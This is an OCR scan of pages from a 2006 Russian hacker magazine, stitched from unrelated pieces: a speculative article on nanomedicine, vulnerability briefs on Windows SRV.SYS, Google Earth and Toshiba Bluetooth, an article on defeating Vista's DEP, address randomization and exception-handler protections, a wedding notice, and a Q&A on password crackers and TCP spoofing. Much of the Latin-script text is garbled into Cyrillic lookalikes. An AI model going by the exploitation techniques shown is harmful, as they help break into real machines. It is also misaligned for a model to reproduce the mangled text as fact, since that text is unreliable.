кубических сантиметров, тебя не должно 
«раздуть» от такого страшного количества 
наномашин. 

За 30 секунд миллиарды нанороботов за- 
хватят по несколько бактерий и с успехом 
их переварят. 

Грубые арифметические подсчеты пока- 
зывают, что в среднем через 30 минут, а 
в крайнем случае через 2 часа ты будешь 
полностью здоров. 

Как ни удивительно это звучит, но энергию для 
работы микрофагоцит будет получать из тво- 
ей крови. Он будет вытягивать из нее основ- 
ное топливо всех медицинских наноустройств 
— глюкозу. Она, взаимодействуя с кислоро- 
дом в специальных реакторах, приведет в дви- 
жение все механизмы и компьютеры робота. 
Так что, плотно подзаправившись чем-нибудь 
сладким, можно «зарядить батарейки» нано- 
роботов на несколько дней. 



Согласно теории, все терапевтические на- 
нороботы соединятся между собой с помо- 
щью акустических передатчиков, которые 
будут транслировать всю информацию об 
их работе на узловые станции, размещен- 
ные в кабинете у врача или у тебя на кож- 
ном дисплее. 

Получается, что у тебя в теле может нахо- 
диться целая медицинская сеть, состав- 
ленная отдельными компьютерами нано- 
роботов. Например, если появилась новая 
разновидность вируса гриппа, ты скачива- 
ешь по медицинской сети обновленный ан- 
тивирус, и миллиарды наномашин внутри 
тебя тут же перестраивают свои молеку- 
лярные гнезда-липучки, для того чтобы те 
могли ловить вражеские микроорганизмы. 

□ Майка для супермена 

Лечение человека — не единственное на- 
правление деятельности наномедицины. 
Она занимается и другими, более интерес- 
ными вопросами. Один из них — усовершенс- 
твование человеческого тела. Например, ты 
упал с девятого этажа. Что бы было с тобой 
в XX и начале XXI века? Скорее всего, ты бы 
разбился. Ну, в лучшем случае остался бы 
инвалидом. В конце XXI века человек, про- 
шедший через имплантацию искусственной 
кровеносной системы — васкулоида, отде- 
лается легким испугом. 

И это без всяких силовых полей, антиграви- 
тации и других похожих трюков. Все гораздо 
проще. Представь себе, что у тебя есть ку- 
сок алмаза с тебя размерами и что ты кида- 
ешь его с девятого этажа. Ну, естественно, 
был бы у тебя такой кусок, ты бы его никуда 
не кидал. Но ведь это только иллюстрация, 
так что представь. Что будет с алмазом? 
Да ничего не будет! 

А теперь вообрази, что этот кусок алмаза 
поместили внутрь тебя. Причем так, что ты 
можешь жить как раньше. Звучит фантас- 
тично, ноэто, кактыдальшеувидишь, вполне 
возможно при соответствующем развитии 
наномедицины. 

Несколько лет назад ученые задумались над 
вопросом: можно ли полностью заменить кро- 
веносно-сосудистую систему человека одним 
сложным комплексом из нанороботов? 
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> Молекулярные сортирующие рото- 
ры и присоединительные места 



Каждый молекулярный ротор имеет 
гнезда по окружности, конфигуриро- 
ванные под определенные молекулы. 
Находясь в окружении молекул, гнез- 
да селективно связывают заданные 
молекулы и удерживают их до тех пор, 
пока они не окажутся внутри устройс- 
тва. От «гнезда» их отсоединяет стер- 
жень, расположенный внутри ротора. 
Такие роторы будут спроектированы 
из 105 атомов. Они позволят созда- 
вать давление в 30000 атмосфер. 
Роторы полностью обратимы, и поэто- 
му могут быть использованы как для 
нагнетания, так и для выгрузки газов, 
воды и глюкозы. Каждый ротор имеет 
для присоединения молекул 12 гнезд, 
расположенных по длине окружности 
ротора. 

Все присоединительные места, опи- 
санные выше, могут работать бла- 
годаря усилиям Ван-Дер-Ваальса 
и Кулона. Ученые предлагают ряд 
«механических» рецепторов для 
сортировки молекул. По сигналу с 
компьютера рецептор автоматически 
принимаетформу нужной молекулы. 



Конечно, сделать это будет довольно труд- 
но, ноненевозможно.Тем более что необхо- 
димо сконструировать только один рабочий 
экземпляр, а остальные благодаря методам 
автоматизированного молекулярного конс- 
труирования будут растиражированы за 
считанные дни. 

Идея «робокрови» (гоЬоЫоосІ) состоит в 
нанесении на внутреннюю поверхность 
всех кровеносных сосудов и капилляров 
человека плоских нанороботов-плиток из 
алмазоида. Соединения между наноробо- 
тами будут гибкими, поэтому живой сосуд, 
одетый в алмазную кольчугу из медицинс- 
ких роботов, сможет сгибаться и даже рас- 
ти дальше. 

А в стрессовых ситуациях нанороботы будут 
плотно примыкать друг к другу, формируя 
алмазный скелет кровеносной системы. 
А так как капилляров и сосудов в теле очень 
много, все тело в моменты пиковой работы 
васкулоида приобретет необычайно высо- 
кую твердость. 



Но кроме защитных функций, васкулоид 
сможет осуществлять более эффективный 
транспорт газов — одну из основных функций 
кровеносной системы. 

Чтобы ты представил себе, насколько это бу- 
дет сложное устройство, я приведу несколько 
чисел. Ориентировочно васкулоид включит в 
себя 500 миллиардов независимых наноробо- 
тов, работающих совместно. Масса его будет 
около 2 кг, рассеиваемая мощность — от 30 до 
200 Вт. Базовым кирпичиком васкулоида пред- 
положительно станет двумерная оболочка 
площадью около 300 кв.м, состоящая из вас- 
кулоцитов — тех самых алмазных элементов. 
Для того чтобы в робокрови нормально проис- 
ходилатранспортировка клеток, нутриентов и 
газов, а также проводился обмен между кро- 
веносными сосудами и тканями, будут предус- 
мотрены специальные молекулярно-транс- 
портные «стыковочные доки» в количестве 
приблизительно 24 миллиардов. И это не толь- 
ко танкеры, транспортирующие молекулы, но 
и роботы, ремонтирующие клетки. 

Ты уже понял, что создать внутренний робо- 
тизованный скелет из алмаза будет совсем 
непросто. Более того, со значительными 
трудностями связан процесс имплантации 
его человеку. 

Инсталляция васкулоида в теле пациен- 
та потребует полной анестезии. При этом 
основные платы васкулоида сформируют 
искусственную эндотелиальную оболочку 
сосудов, а затем циркулирующие жидкости 
выведутся васкулоидом из тела пациента, 
заменяясь нанороботами. 

После всего изложенного у тебя, наверное, 
возникнет вполне определенный вопрос: 
зачем заменять замечательно функциони- 
рующую естественную кровеносную сис- 
тему человека неизвестным искусственным 
органом? На этот вопрос есть несколько от- 
ветов. Так, например, ожидается, что систе- 
матакой сложности будет особенно полезна 
врачам при лечении различныхзаболеваний. 
И, скорее всего, во второй половине XXI ве- 
ка применение васкулоида станет обычным 
приемом. 

Если ты помнишь, примерно тоже самое 
было при развитии компьютеров. В далеких 
60-х никто не мог представить, что машины 
размерами с комнату сожмутся до размеров 
телефона, которым можно будет еще и фото- 
графировать. 

□ Ріпсі а йЫА В110 

Возможности наномедицины воистину без- 
граничны. С помощью наномашин можно 



будет даже приостановить старение тела. 
Для этого каждую клетку организма придет- 
ся «взять научет» и периодически проверять 
специальными нанороботами-ремонтни- 
ками, оснащенными наноманипуляторами, 
которые будут ее «чинить», оперируя уже 
отдельными молекулами клетки. 

Но, к сожалению, воскрешать мертвых 
даже наномедицина скорее всего будет не в 
силах. В течение клинической смерти под- 
держать жизнь в пациенте еще есть шансы, 
покажив самый главный орган — головной 
мозг. Но при смерти человека происходит 
потеря его структуры. 

Даже если периодически записывать по- 
атомную структуру головного мозга па- 
циента, а потом восстанавливать его с 
последнего «чекпоинта», то это все равно 
будет не тот человек, который умер. Он не 
будет помнить отрезок времени, прошед- 
ший с момента «чекпоинта» до смерти. 
Конечно, можно будет сконструировать 
сложные системы мониторинга состояния 
головного мозга, для того чтобы как можно 
чаще «сохранять» его структуру. Проще 
разработать меры по предотвращению 
преждевременной смерти и смерти от не- 
счастных случаев. 

Можно реконструировать тело человека, 
снабдив его набором имплантов и наноро- 
бототехники, что позволит радикально про- 
длить срок человеческой жизни и защитить 
людей от 99% существующих заболеваний. 
Но защититься настолько же эффективно 
от несчастных случаев вряд ли удастся. 

В целом будущее поколение станет здоро- 
вее, моложе и сможет жить практически 
неограниченное количество лет. Но опас- 
ность случайной смерти останется всегда. 
Воскрешать же мертвецов, пролежав- 
ших дни, годы или столетия в могилах 
— утопия. Этого не достичь даже с по- 
мощью самой развитой наномедицины. 
Без информации о строении головного 
мозга умершего нельзя добиться его воз- 
вращ ения кжизни. 

Как ты понимаешь, чудес на свете не быва- 
ет. Поэтому быстрые преобразования в ор- 
ганизме возможны лишь в определенных 
пределах, и нестоитждатьотнаномедицины 
откровенных диковин, вроде полета в возду- 
хе и выхода в открытый космос. 

Зато, посмотри, что нас ждет — будущее 
практически без болезней и просто неогра- 
ниченные возможности для взлома всей этой 
дребедени, которая будет плавать по нашим 
сосудам. НС 
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> Внешний вид сайта Зоодіе ЕагІЬ, продол 
жающего раздаватьуязвимую программу 



> Отсюда можно слить заплатки для дыря 
вых драйверов фирмы ТозЫЬа 



> Исходный код ехріоіі'а, созданного 
сосогисіег'ом 




ОМісгозоКѴѴіпеІоѵѵзЗМВ: 
удаленное выполнение кода 

Вгіеі 7 

В службе общих файлов и принтеров обнару- 
жилась ошибка, о которой рапортовали сразу 
2 человека — Оегагбо Вісітаііе из Соге Зесигііу 
Тесітпоіодіез и МаИІіеѵѵ Атсіиг из ѴМѴѴаге, а 
также исследовательские группы N3 Росиз и 
Рогііпеі. Послав специальным образом сконс- 
труированный пакет, любой неавторизован- 
ный злоумышленник может вызвать основа- 
тельное разрушение внутренних структур 
драйвераЗВѴ.ЗѴЗ, что приведетлибо котказу 
в обслуживании, либо кзахвату управления на 
уровне нулевого кольца. Все это дает неогра- 
ниченную власть над компьютером. Образец 
пакета-разрушителя содержится в ехріоіі'е, 
написанном хакером сосогисіег'ом и опубли- 
кованном ЗепФіІ Ѵеіап'ом. Подробности об 
уязвимости содержатся в бюллетене безо- 
пасности МісгозоЙ, зарегистрированном под 
номером М306-063: ИДр://ѵѵѵѵѵѵ.тісгозоІ1.сот/ 
ІесИпеІ/зесигіІѵ/ВиІІеІіп/МЗОб-ОбЗ.тзрх . 

Тагде^з 

Уязвимости подвержены практически все 
ѴѴіпбоѵѵз-системы: \л/2к ЗР4, ХР ЗР1/ЗР2, 
ХРх86-64,Зегѵег2003/Зегѵег20033Р1/Зегѵег 
2003 х86-64/3егѵег 2003 ІА64 (Катит). 

Ехріоі* 

Исходный код ехріоіі'а, вызывающего отказ 
в обслуживании (но не удаленное выполне- 
ние кода!) лежит на сервере зесигііу4осиз'а: 
ИДр://боѵѵпІоабз.зесигіЫосиз.сот/ѵиІпегаЫІі1іез/ 
ехрІоіІз/МЗОб 035-аид222006.с . 

Зоіи+іоп 

Місгозоіі уже выпустила заплатки для всех 
своих систем, которые можно скачать через 
службу ѴѴіпбоѵѵз ІІрсІаіе, однако никаких га- 
рантий, что дыра залатана полностью, у нас 
нет. Поэтому для надежности рекомендуется 
закрыть следующие порты на брандмауэре: 
ІЮР: 135, 137, 138 и 445; ЮР: 135, 139 и 445. 



О Ооодіе ЕагІН: 

удаленное выполнение кода 

ВгіеГ 

В первых числах октября коллектив ис- 
следователей ЗААЗсоіз ЗесигКу Теат об- 
наружил огромную дыру в приложении 
Ооодіе ЕагФ (Ьеіа), выпущенном 13 сен- 
тября 2006 года. Дыра допускала возмож- 
ность засылки зИеІІ-кода с последующим 
захватом управления и привилегий запус- 
тившего его пользователя. А большинство 
пользователей, как известно, постоянно 
сидят под администратором. Это типичное 
переполнение буфера в обработчике кті- и 
кпгі 2 -файлов: программа выделяет блок па- 
мяти фиксированного размера и копирует 
туда принятые данные, забыв перед этим 
проверить их фактическую длину. 

Тагде* 

Дыра содержится в версии 4.0.2091. Каки 
принято у гугла, носящего статус Ьеіа, про бо- 
лее ранние версии пока ничего неизвестно. 
При запуске приложения под управлением 
ѴѴіпбоѵѵз Ѵізіа (вплоть до РС1 ), работающей на 
процессорах с аппаратной поддержкой ЭЕР 
(то есть битов ІМХ/ХЭ), вероятность успешной 
атаки составляет 1/256 за счет частичной 
рандомизации адресного пространства, а в 
остальных случаях уязвимая бета рушится с 
воплем о критической ошибке. 

Ехріоі* 

Исходный код ехріоіі'а, демонстрирующего 
переполнение, но не содержащего зітеіі- 
кода, можно скачать как с сервера зесигііу- 
Іосиз'а так и с сервера самого коллектива 
^АЗсоіз Зесигііу Теат: ИЦр://іаазсоіз.сот . 

Зоіи-Моп 

Поскольку компания Ооодіе предпочла дейс- 
твовать методом страуса, рекомендуется пре- 
кратить использование Ооодіе ЕагіІт (Ьеіа) 
вплоть до изменения ситуации — выхода об- 
новленной беты или хотя бы заплатки. 



ОТозЫЬа ВІиеІооІН-стек: 
удаленное выполнение кода 

Вгіеі 7 

ФирмаТозЫЬа выпускает чипы беспроводных 
Віиеіооііт-устройств, используемые многими 
производителями материнских плат и другого 
оборудования. Она же пишет под них драй- 
веры, реализующие сетевой ВІиеіооіІт-стек. 
1 1 октября 2006 года ЭаѵісІ Маупог из 
ЗесигеѴѴогкз Іпс. и независимый исследова- 
тель Зоп ЕІІсб опубликовали сообщение о 
дыре в драйвере ТОЗВЕВЭ.ЗѴЗ. Дыра приво- 
дит к разрушению памяти с отказом в обслу- 
живании типа перезагрузки системы или голу- 
бого экрана смерти, а при удачном стечении 
обстоятельств — и к захвату управления ком- 
пьютером на ядерном уровне привилегий. 

Тагде-^5 

Уязвимости подвержены все версии драйве- 
ров от 3 до 4.00.35 включительно, в том числе 
и ТозІтіЬа ВІиеІооіІт Зіаск 4 ЗР2. Эти драйве- 
ры поставляются вместе с оборудованием, 
выпущенным АЗІІЗ, ЭеІІ, Золу и другими ком- 
паниями. Определить, подвержено ли угрозе 
конкретно взятое устройство или нет, можно 
по наличию драйвера ТОЗВЕВЭ.ЗѴЗ или по 
имени производителя (ТозІтіЬа) в свойствах 
беспроводного устройства. 

Ехр1оі+ 

Для реализации атаки ехріоіі'а не требуется, 
достаточно как следует пропинговать жертву, 
обрушив на нее шквал І_2САР-есІто-запросов, 
что можно осуществить с помощью Ііпих-ути- 
литы І2ріпд. Атаки этого типа довольно широ- 
ко распространены и называются ВІиеЗтаск. 
Подробнее о них можно прочитать на 
ІтДр://1гіІіпі1е.огаЛгіІіпі1е зіиІІ Ыиезтаск.ЫтІ . 

Зоіи-Моп 

Фирма ТозІтіЬа выпустила заплатки для 
своих драйверов, доступные для скачки по 
ІтДр://арз.1озІтіЬа-1го.бе/Ыие1оо1Іт/гесІігес1. 
рІтр?раде=раде5/сІо\л/пІоасІ.рІтр . 



ХАКЕР 1 1 /95/ 06 



/061 







□ Переполнение 

буферов в суровыхусловиях висты 

Вгіеі 7 

Есть две новости. Хорошая и плохая. Начну 
схорошей. В ѴѴіпсІо\л/зѴіз{а/5егѵегІ_опдІіогп 
полностью переписан сетевой стек и реа- 
лизован ІРѵб, причем реализован очень 
коряво. Ранние беты повторяли практи- 
чески все ошибки, допущенные в старом 
сетевом стеке, вылизываемом годами. 
И хотя основные дыры в Ѵізіа РС1 уже за- 
латаны, сама новизна ІРѵб протокола вку- 
пе с непротестированным сетевым стеком 
выглядит весьма сексапильно и открывает 
огромные перспективы для всевозможных 
атак. Для хакеров это настоящий клад. Те- 
перь плохая новость. МісгозоЙ предприня- 
ла целый комплекс противохакерских мер, 
затрудняющих засылку зИеІІ-кода и реали- 
зацию большинства атак, поэтому, прежде 
чем виста станет доминирующей системой 
(а случится это, скорее всего, через год- 
полтора), злоумышлен никам для адаптации 
к новым условиям потребуется проапгрей- 
дить арсенал своего оружия. Что же это за 
защитные механизмы, и можно ли их обой- 
ти? Вотоб этом мы сейчас и поговорим. 

Ыго 

Основные оборонительные сооружения 
расставлены вокруг переполняющихся бу- 
феров, однако эта стратегия обречена на 
поражение, поскольку повышенный инте- 
рес к атакам этого типауже позади. Достиг- 



нув пика своей популярности в 2005 году, 
переполняющиеся буферы «стали кло- 
ниться к закату». Хакерская мысль не стоит 
на месте! Набирают силу атаки, основан- 
ные на ошибках синхронизации драйве- 
ров, примерами которых являются дыры в 
драйверах ІпіеІ Сепігіпо и ТозМЬа Віиеіооіф 
дающие захватчикам ядерные привилегии 
нулевого кольца! Но все-таки вернемся 
к переполняющимся буферам. Было бы 
глупо сдаваться без боя, тем более что оборону 
МісгозоЙ'а сравнительно легко прорвать. 

С'ЕР 

Доля процессоров с аппаратной под- 
держкой ОЕР обречена на неуклонный 
рост. И хотя на х86-платформах ВЕР по 
умолчанию включен только для некоторых 
системных служб, поскольку все еще су- 
ществуетмножество приложений, нуждаю- 
щихся в исполняемом стеке (особенно это 
относится к упаковщикам, протекторам и 
прочим защитным механизмам), разработ- 
чики уже отреагировали на эту инициативу. 
Новые версии (в своей массе) больше не 
трактуют атрибут РАОЕ_РЕАО как РАОЕ_ 
ЕХЕСІ)ТАВІ_Е, и перед выполнением кода 
в области памяти, отличной от секции .іехі, 
атрибут РАОЕ_ЕХЕСІІТАВІ_Е присваивает- 
ся явно для того, чтобы программа могла 
работать при включенном ОЕР. Кстати го- 
воря, это обязательное требование, предъ- 
являемое МісгозоЙ'ом при выдаче логотипа 
ѴѴіпсІоѵѵз СотраІіЫе. Несложно спрогнози- 
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ровать, что через несколько лет программ, 
конфликтующих с ОЕР, практически не 
останется совсем и в очередном Зегѵісе 
Раске'е для висты МісгозоЙ запросто смо- 
жет поменять политику «ЭЕР выключен по 
умолчанию для несистемных приложений» 
на «ЭЕР включен по умолчанию для всех 
приложений». Сам по себе ЭЕР несильно 
осложняет жизнь хакерам и легко обхо- 
дится атаками типа геіигп-іо-ІіЬс (подробно 
описанными в моей статье «Судьба збеІІ- 
коданасистемахс неисполняемым стеком, 
или атака на ВЕР», которую можно скачать 
с {ірѴ/пегиті.ога.ги ). Однако в комбинации 
с другими защитными механизмами ОЕР 
превращается в мощную броню, сущест- 
вование которой приходится принимать в 
расчет, как и тот факт, что эта броня про- 
жигается кумулятивными снарядами, про- 
двигаемыми на рынок самой же Місгозо^ 
подвидом платформы ,[\ІЕТ, базирующейся 
на интерпретируемом языке С#. Несмотря 
на то что С# намного меньше подвержен 
ошибкам переполнения, чем Си, защитные 
свойства ОЕР'а на него не распространя- 
ются, поскольку интерпретируемый код с 
точки зрения процессора представляет 
данные, которые не нуждаются в атрибуте 
РАОЕ_ЕХЕСІІТАВІ_Е. На самом деле, С# не 
совсем интерпретируемый, а компилируе- 
мый в память, причем откомпилированный 
код помещается в область памяти, доступ- 
ную как для записи, так и для исполнения. 
Так что внедрение процессоров с под- 
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> В 64-битных версиях ѴѴіпсІоѵѵз МісогозН наложила запрет на модификацию 
ядра, что делает невозможным сущестование антивирусов, которые с ее при- 
ходов обречены на вымирание. Останутся только автономные сканеры 



держкой аппаратного ОЕР'а компенсиру- 
ется победоносным шествием .ІМЕТ'а, на 
котором удобно писать интерфейс, но реа- 
лизовывать приложение целиком — нет уж, 
увольте. Во-первых, С#стоитнамного ближе 
к ѴізиаІ Вазіс'у, чем к Си, а какая у Вазіс'а про- 
изводительность? Во-вторых, на Си/Си++ 
написано огромное количество библиотек, 
которые никто переписывать на ,І\ІЕТ не 
собирается, и ближайшие 3 — 5 лет боль- 
шинство программ продолжат стоиться 
по гибридному принципу — Си/Си++ плюс 
С#, что позволит эксплуатировать ошибки 
переполнения, характерные для Си/Си++, 
через С#! Если хакерская активность и 
снизится, то несильно. 

Еапгіз 

Классический сценарий атаки на перепол- 
няющиеся буферы предполагает подмену 
адреса возврата из функции на адрес ма- 
шинной команды )тр езр (опкод РЕИ Е4Н), 
находящейся где-то в оперативной памя- 



ти, и подобных команд там предостаточно. 
Такие двухбайтовые последовательности 
в изобилии встречаются как в системных 
библиотеках, так и в самом атакуемом при- 
ложении. )тр езр передает управление на 
вершину стека, в которой расположен пере- 
полненный буфер, содержащий зНеІІ-код, и 
все идет по плану, по такому хорошему ко- 
нопляному плану, выращенному под жарким 
южным солнцем. Но при включенном ОЕР 
такой план ни хвоста не торкает, поскольку 
выполнение команд в стеке категорически 
запрещено, и приходится совершать ряд до- 
полнительных действий по устранению этих 
досадных неприятностей. Самое простое, 
что можно сделалась, — это занести в стек 
адрес АРІ-функции ѴИиаІРгоіеср которая 
позволяет манипулировать атрибутами до- 
ступа к памяти, а вслед за (ним) — адрес АРІ- 
функции МоѵеМетогу, которая копирует 
зНеІІ-код из стека в область памяти, обрабо- 
танную функцией ѴігЩаІРгоіесі, присвоив- 
шей ей атрибут «исполняемый». Остается 



только передать сюда управление, для чего 
в стек кладется адрес новой дислокации 
зіпеіі-кода, и наступает полный приход. 

Как видно, независимо от активности ОЕР 
мы должны знать содержимое адресного 
пространства жертвы атаки, чтобы найти 
в памяти инструкцию ]гпр езр или адреса 
АРІ-функций. НаХР и Зегѵег 2003 это не 
представляет никаких проблем, поскольку 
и сам исполняемый файл, и системные биб- 
лиотеки всегда грузятся по одним и тем же 
адресам. Конечно, эти адреса постоянны 
только в рамках данной версии ѴѴіпсІоѵѵз 
и меняются с каждым Зегѵісе Раск'ом, что 
вынуждает атакующего либо определять 
версию косвенным путем, либо просто дейс- 
твовать наугад. Если ему повезет, он будет 
кайфовать, в противном случае у жертвы 
случится крэш и она словит сообщение о 
критической ошибке, а вместе с ним — бэд 
трип. Постоянным и независящим отверсии 
остается только базовый адрес загрузки са- 
мого уязвимого приложения, однако это не 
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слишком большая зацепка, поскольку при 
смене версии меняется и его содержимое. 
То есть написать универсальную атакую- 
щую программу, поражающую все системы 
не так-то просто, а в общем случае — вооб- 
ще невозможно, но это обстоятельство не 
ломает кайф и не высаживает на измену. 
Количество версий ѴѴіпбоѵѵз (вместе с вер- 
сиями уязвимого приложения) хоть и велико, 
но все-таки конечно. Если настойчиво дол- 
бить жертву, то рано или поздно она скажет: 
«Пых!», збеІІ-код получит управление, и все 
будуточень довольны, ну или почти все. 

Что изменилось в висте? Системные библио- 
теки теперь грузятся по одному из 256-ти 
возможных базовых адресов, выбираемому 
случайным образом. В заголовке исполня- 
емых файлов появился специальный бит, 
указывающий, должен ли он загружаться 
по фиксированному или наугад взятому ад- 
ресу. То же самое относится к несистемным 
динамическим библиотекам. Это значит, 
что в настоящий момент реально радноми- 
зируются только системные библиотеки и 
приложения, входящие в комплект штатной 
поставки висты. Все ранее написанные при- 
ложения грузятся по одному и тому же ад- 



ресу и будут грузиться по нему еще долго, 
поскольку сторонние разработчики крайне 
прохладно относятся к новой инициативе 
МісгозоЙ. И даже когда появятся линкеры, 
поддерживающиефлаграндомизации, вовсе 
не факт, что каждый поспешит им восполь- 
зоваться. Причина этому в том, что загрузка 
по произвольному адресу требует наличия 
таблицы перемещаемых элементов, увели- 
чивает потребности в оперативной памяти 
(особенно при запуске нескольких копий 
приложения) и облегчает взлом, поскольку 
существующие упаковщики/протекторы не 
поддерживают рандомизацию и распако- 
вывают файл по фиксированным адресам. 
Отсюда следует, что часть адресного про- 
странства уязвимого приложения, относя- 
щаяся к исполняемому файлу и его личным 
динамическим библиотекам, по-прежнему 
остается предсказуемой. А это позволяет 
атакующему свободно передавать управ- 
ление на зНеІІ-код через ітр езр, а также 
вызывать любые функции, содержащиеся 
в уязвимом приложениии или импортируемые 
им и в таблице импорта конкретно взято- 
го приложения ее вполне может и не быть. 
На самом деле, ситуация практически никак 
не изменилась. Вероятность 
успешной атаки (с учетом кучи 
версий ѴѴіпбоѵѵз) и раньше не 
составляла 100%, теперь же 
она сократилась приблизи- 
тельно в 256 раз. И это они еще 
называют надежной защитой! 
Ну-ну... Тот, кто очень хочет, 
своего добьется. Если хакер бу- 
дет настойчиво долбиться, рано 
или поздно он угадает базовый 
адрес КЕВМЕІ_32.ЭІ_І_, содер- 
жащей все необходимые ему 
функции, и тогда жертва падает. 
То есть как раз наоборот — тогда 
произойдет захват управления 
удаленной машиной, а во всех 
остальных случаях — ее паде- 
ние. Администратор запарит- 



ся поднимать сервер (рабочую станцию), 
не понимая, толи это его атакуют, толи 
что-то конкретно глючит (например, сбоит 
память). Правда, заподозрив атаку, он смо- 
жет быстренько скачать все заплатки (при 
условии, что они есть), заткнув дыры. А при 
настойчивой долбежке компьютер будет па- 
дать так часто, что ничего скачать не удастся ! 
Но все-таки, падения — это нехорошо. Зачем 
привлекать излишнее внимание? Чтобы по- 
давить сообщения о критических ошибках, 
необходимо перезаписать указатель на те- 
кущий обработчик структурных исключений, 
с которым связана еще одна оборонная ини- 
циатива МісгозоЙ — в висте он перемещен из 
легко затираемого стека в секцию .рсіаіа, до- 
ступную только для чтения. Все это относится 
только к статическим обработчикам струк- 
турных исключений, адрес которых известен 
еще на стадии компиляции. Это справедливо 
для простых Си-программ, но в Си++ доста- 
точно большое количество обработчиков 
устанавливаются динамически. К тому же ус- 
тановкой обработчиков ведает компилятор, 
а все существующие компиляторы размешают 
указатели на обработчики в стеке! Так что по- 
явление висты само по себе ничего не меняет. 
Как минимум необходимо дождаться появле- 
ния обновленных версий компиляторов, а до 
этого можно смело перезаписывать и пере- 
назначать обработчики структурных исклю- 
чений на свои собственные. Правда, начиная 
с Зегѵег 2003, система выполняет дополни- 
тельную проверку, препятствующую разме- 
щениюкодаобработчикавстеке. Но... можно 
подсунуть адрес одного из обработчиков уяз- 
вимого приложения, который бы не завершал 
работу приложения и не выдавал бы никаких 
сообщений наэкран, атем или иным образом 
обработав исключение, продолжал бы рабо- 
ту в обычном режиме. В большинстве случаев 
для этого достаточно прыгнуть сразу в сере- 
дину обработчика поближе к АРІ-функции 
Сопііпие, и можно смело долбить переполня- 
ющийся буфер, перебирая все возможные 
варианты один за другим. ЗЕ 
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ПОЗДРАВЛЯЕМ! 




ВСЕЛЕНСКОГО СЧАСТЬЯ 
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ГЛАВНЫЙ ХАКЕР СТРАНЫ РОРВ ЖЕНИЛСЯ НАЗАМЕЧАТЕЛЬНОЙ ДЕВУШКЕ ОКСАНЕ. 

ОТ ВСЕЙ ДУШИ ПОЗДРАВЛЯЕМ МОЛОДОЖЕНОВ С ТАКИМ РАДОСТНЫМ СОБЫТИЕМ И ЖЕЛАЕМ 
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О: Я забыл пароль на... 

Что мне делать? 

А: Это очень распространенный вопрос. Поэ- 
тому в ответе я специально собрал имена и до- 
машние страницы крякалок ко всем основным 
программам, к которым часто теряются пароли 
в ѴѴіпбоѵѵз. Далее я называю только бесплат- 
ные программы (Ігееѵѵаге). 

&іа1ирагг ( ѵѵѵѵѵѵ.пігзоіі.пеі: ) находит пароли 
к стандартной «звонилке» в ѴѴіпбоѵѵз 2000/ 
ХР/2003 на ЭіаІир/ЯАЗ/ѴРІЧ. 

МаіІ Р-э5гѴіе\ѵ ( ѵѵѵѵѵѵ.пігзоІІ.пеД восстана- 
вливает пароли к почтовым ящикам в ОиІІоок 
Ехргезз, МісгозоІІ ОиІІоок 2000/2002/2003, 
ІпсгебіМаіІ, Еибога, ІЧеІзсаре МаіІ, МогіІІа 
ТЬипбегЬігб, (Згоир МаіІ Ргее. 

ТЬе Ва*! бпРагг ( ЬДр://Шир.Ьоот.ш ) восстанав- 
ливает пароли к почтовым ящикам в ТЬе Ваі! 
всех версий. 

Аг^егігк І_оддег ( ѵѵѵѵѵѵ.пігзоІІ.пеО показывает па- 
роли, спрятанные под звездочками (****). Такие 
пароли используются во многих программах, 
например СиІеРТР, СоІІееСир Ргее РТР, ѴІЧС, 
ІпсгебіМаіІ, а также ОиІІоок Ехргезз и ТИе ВаІІ. 
ЮР ( ѵѵѵѵѵѵ.ІсрзоІІ.сот ) предназначена для вос- 
становления паролей пользователей операци- 
онных систем ѴѴіпбоѵѵз ІМТ/2000/ХР/2003. 
МеггепРагг ( ѵѵѵѵѵѵ. пігзоіі. пеП восстана- 
вливает пароли к ІСО ІЛе, Мігапба, ТгіІІіап, МЗІЧ 
Меззепдег, ѴѴіпбоѵѵз Меззепдег, (Зоодіе Таік, 
АОЕ Іпзіапі Меззепдег и т. д. 

Меззепдег Кеу ( ѵѵѵѵѵѵ.іозіраззѵѵогб.сот/ 
теззепдег.Ыт ) — для восстановления паро- 
лей к ІСО всех версий, начиная с ІСО 99. 
Рго*ес*е<і З^огаде РаззѴіеѵ ( ѵѵѵѵѵѵ.пігзоіі.пеі: ) 



показывает пароли, сохраненные в системе 
такими программами, как Іпіегпеі Ехріогег, МЗІЧ 
Ехріогег и ОиІІоок Ехргезз. Пароли считываются 
прямо из ѴѴіпбоѵѵз Ргоіесіеб Зіогаде. Это очень 
полезная программа, так как может помочь 
восстановить забытые пароли к форумам, ча- 
там, ѵѵеЬ- магазинам, почтовым ящикам и про- 
чим ѵѵеЬ-сервисам. К сожалению, бесплатных 
крякалок к зашифрованным архивам и про- 
граммам Місгозоіі ОІІісе мне найти не удалось. 
Поэтому могу только предложить сходить на 
сайт ѵѵѵѵѵѵ.раззѵѵогбз.ги . где ты найдешь услов- 
но бесплатные и демоверсии переборщиков 
паролей практически ко всем архивам ВАР/ 
ѴѴіпРАР , 2ІР/ѴѴІП2ІР, АРи/ѴѴіпАРЦ АСЕ/ѴѴіпАСЕ 
и запароленным документам МісгозоЙ ОІІісе 
95/97/2000/ХР/2003, а также к другим запаро- 
ленным программам. 

О: Чем отличается ІР-спуфинг от 
ТСР-спуфинга? 

А: «Спуфинг» (зрооііпд) с ангельского пере- 
водится как «обман». Как ты понимаешь, об- 
манывать можно разными способами. ІР-спу- 
финг, как следует из самого названия, связан 
с ІР-протоколом, ТСР-спуфинг — с ТСР-прото- 
колом. ІР-спуфинг — это подмена обратного 
ІР-адреса в посылаемых пакетах. Этот прием 
часто используется хакерами для сокрытия 
своего местонахождения (точнее — узла, с ко- 
торого осуществляется атака). 

ТСР-спуфинг предназначен для перехвата 
соединения между жертвой и другим узлом с 
помощью поддельных ТСР-пакетов. При этом 
соединение жертвы повисает, а атакующий 
может работать с узлом, выдавая себя за жер- 



тву. Чтобы осуществить ТСР-спуфинг, хакер 
должен узнать 32-битные значения (183 — ІпШаІ 
Зециепсе ІЧитЬег) в полях Зециепсе ІЧитЬег и 
Аскпоѵѵіебдтепі ІЧитЬег заголовков ТСР-па- 
кетов, пересылаемых между жертвой и узлом. 
Если хакер и жертва находятся в одной сети, 
то получить эти значения можно с помощью 
снифера. В старые добрые времена Митника 
можно было угадать начальное значение 133, 
так как операционные системы генерировали 
его по известным алгоритмам. Для перехвата 
соединения нужно было послать шторм ТСР- 
запросов с наиболее вероятными значениями. 
Но в наше время операционные системы гене- 
рируют 133 случайным образом и угадать значе- 
ния уже не получится. Рекомендую на эту тему 
статью Баггзи «ТСР-спуфинг: пошлая сказка» 
